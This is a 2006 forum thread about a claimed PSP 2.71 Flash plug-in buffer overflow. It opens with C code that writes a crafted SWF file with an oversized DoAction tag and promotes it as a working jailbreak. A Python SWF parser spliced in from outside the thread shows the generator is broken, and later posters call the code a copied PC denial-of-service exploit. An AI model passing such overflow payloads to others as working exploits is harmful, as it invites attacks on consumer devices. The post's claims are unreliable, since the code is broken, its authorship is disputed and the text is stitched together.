New Exploit for 2.7/2.71



CoderX
July 14th, 2006, 21:09
Hello, Coder X here. Below is the code for a buffer overrun exploit I found using the PSP 2.71 Flash browser plug-in.

This exploit is based on a PC exploit (written by a PC coder named BassReFLeX).

Yes, the code needs to be compiled and then you make the swf file.
(Sorry to complicate, but it must be done.) Next the file needs to be converted to a format the PSP can read. "Use one of the thousands of swf version converters available."

Anyone interested in using the exploit and making an e-loader, please give me credit for the exploit and contact me; we can work together to make it.

This is a tested exploit and does work, so I hope you all enjoy. 2.71 users, welcome to homebrew.

I will be working on a bin for the program, so expect Tetris or something out in a bit.


/*
* ***********************************************************
* PSP FW 2.71 Overflow Test
* ***********************************************************
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor] tag header 0x0243 = code 9, length 3, then RGB
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!  tag header 0x033c = code 12, length 60
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";

//[ShowFrame] tag header 0x0040 = code 1, length 0
char ShowFrame[] = "\x40\x00";

//[End] tag header 0x0000 = code 0, length 0
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
/* "cls" only exists on Windows; on other systems this call just fails. */
system("cls");
printf("\n* ********************************************************* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ********************************************************* *");


if ( argc!=2 )
{
usage(argv[0]); /* usage() exits, so argv[1] is valid below */
}

FILE *f;
/* Open in binary mode so the raw tag bytes are written unchanged. */
f = fopen(argv[1],"wb");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

/* Note: sizeof() on a char array includes its terminating NUL, so each
   block below is written with one extra 0x00 byte after it. */
printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
fclose(f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
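
As an added check (not from this thread or its author), here is a parser for the SWF container format the browser plug-in reads: the FWS/CWS signature, version, declared length, frame header, then the tag stream. It reuses the tag bytes from the program above, builds a constructed minimal valid file for comparison, and reproduces in generator_output() the byte stream that program writes, which starts with the text "<swf>" instead of the signature and so is rejected before the tag parser is reached.

```python
import struct
import zlib
# Tag bytes from the generator posted above: 2-byte LE header (code << 6 | length), then body.
SET_BACKGROUND_COLOR = b"\x43\x02\xff\x00\x00"    # code 9, length 3, RGB ff 00 00
DO_ACTION = (b"\x3c\x03\x9b\x08\x00" + b"\x41" * 8 + b"\x00\x40\x00" + b"\x42" * 8 + b"\x00"
             + b"\x43" * 8 + b"\x00" + b"\x44" * 8 + b"\x00" + b"\x45" * 8 + b"\x00"
             + b"\x46" * 8 + b"\x00\x00")         # code 12, length 60
SHOW_FRAME = b"\x40\x00"                          # code 1, length 0
END = b"\x00\x00"                                 # code 0, length 0
def parse_swf(data):
    """Return (version, declared length, [tag codes]); raise ValueError if not an SWF."""
    if len(data) < 8 or data[:3] not in (b"FWS", b"CWS"):
        raise ValueError("no FWS/CWS signature: not an SWF container")
    version, declared = data[3], struct.unpack_from("<I", data, 4)[0]
    if data[:3] == b"FWS" and declared != len(data):
        raise ValueError("header length %d != file size %d" % (declared, len(data)))
    body = zlib.decompress(data[8:]) if data[:3] == b"CWS" else data[8:]
    # Skip frame RECT (5-bit nbits + four nbits fields, byte aligned), frame rate, frame count.
    pos = (5 + 4 * (body[0] >> 3) + 7) // 8 + 4
    codes = []
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        code, length, pos = hdr >> 6, hdr & 0x3F, pos + 2
        if length == 0x3F:                        # long form: length in next uint32
            length, pos = struct.unpack_from("<I", body, pos)[0], pos + 4
        if pos + length > len(body):
            raise ValueError("tag %d runs past end of body" % code)
        codes.append(code)
        pos += length
        if code == 0:                             # End tag closes the file
            break
    return version, declared, codes
def is_swf(data):
    try:
        return parse_swf(data) is not None
    except (ValueError, zlib.error, IndexError):
        return False

def minimal_swf():
    """Constructed: a valid uncompressed SWF carrying the three short tags above."""
    body = b"\x00" + struct.pack("<HH", 12 << 8, 1) + SET_BACKGROUND_COLOR + SHOW_FRAME + END
    return b"FWS" + bytes([6]) + struct.pack("<I", 8 + len(body)) + body

def generator_output():
    """Constructed: the byte stream the posted C program writes (sizeof keeps each NUL)."""
    out = b"<swf>\x00\n"
    for tag in (SET_BACKGROUND_COLOR, DO_ACTION, SHOW_FRAME, END):
        out += tag + b"\x00\n"
    return out + b"</swf>\x00"
```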

Kramer
July 14th, 2006, 21:11
**** yeah, that's another one for the homebrew scene. Now Sony will really start getting pissed off.

D0N
July 14th, 2006, 21:20
OMG, this **** is off the hook! Good work, CoderX!

BrooksyX
July 14th, 2006, 21:22
I sure hope this works out for all the 2.7 plus users.

CoderX
July 14th, 2006, 21:24
I practically went nuts when it worked. Well, it's been 37 hours without sleep. Good night.

ACID
July 14th, 2006, 21:49
I practically went nuts when it worked. Well, it's been 37 hours without sleep. Good night.
Take a well-deserved rest; that looks great. Another point for the homebrew community. Yeah!

acn010
July 14th, 2006, 21:58
Really?!?!?!?!
Oh man!
lmao, oh wow, that's amazing

oafan
July 14th, 2006, 22:14
This is great news for 2.70/2.71 users. I wonder if Sony will just throw out a useless update soon.

Zion
July 14th, 2006, 22:17
Great job! :D :D :D :p :p

D0N
July 14th, 2006, 22:19
I wonder if Fanjita could make an eloader out of this? Probably could...

Malksta
July 14th, 2006, 22:27
Weeee, now my brother will stop bugging me :D

Note: for anyone who doesn't know, PacManFan told me on MSN he is going to release the source code of his PSX emulator, which is 95% done.

smith1
July 14th, 2006, 22:32
http://www.exploits-lab.info/Ddos-Attack/Exploits/Article625-Macromedia-Flash-Plugin-%3C=-70190-(Action)-Denial-of-Service-(DOS)-Exploit.html

Er, he just copied and pasted code from a year ago. Not only that, but it doesn't work. Good game !_!.

yenz
July 14th, 2006, 22:41
Guys, it's fake ;) =/
BTW... could someone ban him for this crap? :S

Read this...
http://forums.qj.net/showthread.php?t=59521&page=1&pp=10

CoderX
July 14th, 2006, 22:57
Ya, umm, read the source of the exploit in my original post; I stated that it is a PC exploit.

Given your post count, you're just a QJ flamer who can't read.

Kramer
July 14th, 2006, 23:09
So do you think something good will come out of this exploit, CoderX?

CoderX
July 14th, 2006, 23:17
I sure hope so; at the moment all it proves is that it can crash a PSP.

I also have to get some code in and see what system calls I can make. We might have kernel, but the browser runs in user mode, so I don't know for sure.

smith1
July 14th, 2006, 23:25
Ya, umm, read the source of the exploit in my original post; I stated that it is a PC exploit.

Given your post count, you're just a QJ flamer who can't read.

All I see is that you edited that in after people figured out that all you did was copy and paste the source code ;).

" Last edited by CoderX : Today at 22:55."

Lmao. You've been proven fake. Your thread was closed and this will be soon. You can't do anything with this exploit. Good game.

under_0ath777
July 15th, 2006, 03:00
there was hitchhikr, fanjita, mph, NOW CoderX!

gamehunter101
July 15th, 2006, 03:06
All I see is that you edited that in after people figured out that all you did was copy and paste the source code ;).

" Last edited by CoderX : Today at 22:55."

Lmao. You've been proven fake. Your thread was closed and this will be soon. You can't do anything with this exploit. Good game.

You guys over at QJ are the reason the scene is falling. Nice board over here at DCEmu and nice people :cool: The people over at QJ pissed CoderX off; I don't know what he will do atm.

youresam
July 15th, 2006, 03:49
You guys over at QJ are the reason the scene is falling. Nice board over here at DCEmu and nice people :cool: The people over at QJ pissed CoderX off; I don't know what he will do atm.
It's just... he said he spent 37 hours making this. Then someone finds a page with the EXACT source, THEN he edits his post saying that he copied that exploit.

I REALLY don't know what to believe. I really want this to happen, so I wish him good luck ;)

Kaiser
July 15th, 2006, 03:57
Seems the evidence is against you, CoderX. I'm probably the worst when it comes to punishing fakers after dealing with the whole Donkey fiasco. I'm going to give you a one two-week ban. It would have been a permanent one had you not been a LUA coder before this.